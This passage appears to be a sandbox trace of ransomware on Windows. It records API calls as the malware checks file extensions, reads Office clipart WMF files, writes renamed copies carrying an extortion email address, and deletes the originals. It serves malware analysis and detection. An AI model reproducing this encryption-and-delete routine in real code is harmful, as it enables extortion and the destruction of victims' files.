lpString2="2.WMF") returned -1 [0182.063] lstrlenW (lpString=".ppt") returned 4 [0182.063] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.063] lstrlenW (lpString=".zip") returned 4 [0182.063] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.063] lstrlenW (lpString=".rar") returned 4 [0182.063] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.063] lstrlenW (lpString=".bz2") returned 4 [0182.063] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.063] lstrlenW (lpString=".7z") returned 3 [0182.063] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString=".dbf") returned 4 [0182.064] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString=".1cd") returned 4 [0182.064] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString=".jpg") returned 4 [0182.064] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString=".doc") returned 4 [0182.064] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString=".docx") returned 5 [0182.064] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.064] lstrlenW (lpString=".pdf") returned 4 [0182.064] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString=".xls") returned 4 [0182.064] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.064] lstrlenW (lpString=".xlsx") returned 5 [0182.064] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.064] lstrlenW (lpString=".ppt") returned 4 [0182.064] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.064] lstrlenW (lpString=".zip") returned 4 [0182.064] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.064] lstrlenW (lpString=".rar") returned 4 [0182.064] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.064] lstrlenW (lpString=".bz2") returned 4 [0182.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.065] lstrlenW (lpString=".7z") returned 3 [0182.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.065] lstrlenW (lpString=".dbf") returned 4 [0182.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.065] lstrlenW (lpString=".1cd") returned 4 [0182.065] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 68 [0182.065] lstrlenW (lpString=".jpg") returned 4 [0182.065] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.065] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.065] lstrlenW (lpString="J0105414.WMF") returned 12 [0182.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.066] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=6244) returned 1 [0182.066] CloseHandle (hObject=0x370) returned 1 [0182.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf")) returned 0x220 [0182.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.066] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.067] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.067] GetLastError () returned 0x0 [0182.067] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1864, lpOverlapped=0x0) returned 1 [0182.069] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1870, lpOverlapped=0x0) returned 1 [0182.070] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.071] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.071] SetEndOfFile (hFile=0x374) returned 1 [0182.071] CloseHandle (hObject=0x374) returned 1 [0182.071] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.071] SetEndOfFile (hFile=0x370) returned 1 [0182.072] CloseHandle (hObject=0x370) returned 1 [0182.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.072] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf")) returned 1 [0182.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.073] lstrlenW (lpString=".doc") returned 4 [0182.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString=".docx") returned 5 [0182.073] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.073] lstrlenW (lpString=".pdf") returned 4 [0182.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString=".xls") returned 4 [0182.073] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.073] lstrlenW (lpString=".xlsx") returned 5 [0182.073] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.073] lstrlenW (lpString=".ppt") returned 4 [0182.073] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.073] lstrlenW (lpString=".zip") returned 4 [0182.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.073] lstrlenW (lpString=".rar") returned 4 [0182.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString=".bz2") returned 4 [0182.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString=".7z") returned 3 [0182.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.073] lstrlenW (lpString=".dbf") returned 4 [0182.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.074] lstrlenW (lpString=".1cd") returned 4 [0182.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.074] lstrlenW (lpString=".jpg") returned 4 [0182.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.074] lstrlenW (lpString=".doc") returned 4 [0182.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString=".docx") returned 5 [0182.074] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.074] lstrlenW (lpString=".pdf") returned 4 [0182.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString=".xls") returned 4 [0182.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.074] lstrlenW (lpString=".xlsx") returned 5 [0182.074] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.074] lstrlenW (lpString=".ppt") returned 4 [0182.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.074] lstrlenW (lpString=".zip") returned 4 [0182.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.074] lstrlenW (lpString=".rar") returned 4 [0182.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString=".bz2") returned 4 [0182.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.074] lstrlenW (lpString=".7z") returned 3 [0182.074] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.075] lstrlenW (lpString=".dbf") returned 4 [0182.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.075] lstrlenW (lpString=".1cd") returned 4 [0182.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 68 [0182.075] lstrlenW (lpString=".jpg") returned 4 [0182.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.075] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.075] lstrlenW (lpString="J0105490.WMF") returned 12 [0182.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0182.076] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=18728) returned 1 [0182.076] CloseHandle (hObject=0x370) returned 1 [0182.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf")) returned 0x220 [0182.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.455] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.455] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.456] GetLastError () returned 0x0 [0182.456] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4928, lpOverlapped=0x0) returned 1 [0182.458] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4930, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4930, lpOverlapped=0x0) returned 1 [0182.460] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.460] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.460] SetEndOfFile (hFile=0x36c) returned 1 [0182.460] CloseHandle (hObject=0x36c) returned 1 [0182.460] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.460] SetEndOfFile (hFile=0x364) returned 1 [0182.461] CloseHandle (hObject=0x364) returned 1 [0182.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf")) returned 1 [0182.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.462] lstrlenW (lpString=".doc") returned 4 [0182.462] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.462] lstrlenW (lpString=".docx") returned 5 [0182.462] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.462] lstrlenW (lpString=".pdf") returned 4 [0182.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.462] lstrlenW (lpString=".xls") returned 4 [0182.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.462] lstrlenW (lpString=".xlsx") returned 5 [0182.462] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.462] lstrlenW (lpString=".ppt") returned 4 [0182.462] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString=".zip") returned 4 [0182.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.463] lstrlenW (lpString=".rar") returned 4 [0182.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString=".bz2") returned 4 [0182.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString=".7z") returned 3 [0182.463] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString=".dbf") returned 4 [0182.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString=".1cd") returned 4 [0182.463] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString=".jpg") returned 4 [0182.463] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.463] lstrlenW (lpString=".doc") returned 4 [0182.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString=".docx") returned 5 [0182.463] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.463] lstrlenW (lpString=".pdf") returned 4 [0182.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.463] lstrlenW (lpString=".xls") returned 4 [0182.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.464] lstrlenW (lpString=".xlsx") returned 5 [0182.464] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.464] lstrlenW (lpString=".ppt") returned 4 [0182.464] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.464] lstrlenW (lpString=".zip") returned 4 [0182.464] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.464] lstrlenW (lpString=".rar") returned 4 [0182.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.464] lstrlenW (lpString=".bz2") returned 4 [0182.464] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.464] lstrlenW (lpString=".7z") returned 3 [0182.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.464] lstrlenW (lpString=".dbf") returned 4 [0182.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.464] lstrlenW (lpString=".1cd") returned 4 [0182.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 68 [0182.464] lstrlenW (lpString=".jpg") returned 4 [0182.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.464] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.464] lstrlenW (lpString="J0105912.WMF") returned 12 [0182.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.465] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=11720) returned 1 [0182.465] CloseHandle (hObject=0x364) returned 1 [0182.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf")) returned 0x220 [0182.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.466] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.466] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.466] GetLastError () returned 0x0 [0182.466] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2dc8, lpOverlapped=0x0) returned 1 [0182.469] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2dd0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2dd0, lpOverlapped=0x0) returned 1 [0182.470] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.470] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.470] SetEndOfFile (hFile=0x36c) returned 1 [0182.470] CloseHandle (hObject=0x36c) returned 1 [0182.470] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.470] SetEndOfFile (hFile=0x364) returned 1 [0182.471] CloseHandle (hObject=0x364) returned 1 [0182.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf")) returned 1 [0182.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.472] lstrlenW (lpString=".doc") returned 4 [0182.472] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.472] lstrlenW (lpString=".docx") returned 5 [0182.472] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.472] lstrlenW (lpString=".pdf") returned 4 [0182.472] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.472] lstrlenW (lpString=".xls") returned 4 [0182.472] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.472] lstrlenW (lpString=".xlsx") returned 5 [0182.472] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.472] lstrlenW (lpString=".ppt") returned 4 [0182.472] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 68 [0182.472] lstrlenW (lpString=".zip") returned 4 [0182.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.473] lstrlenW (lpString=".rar") returned 4 [0182.473] lstrcmpiW (lpString1=".rar", 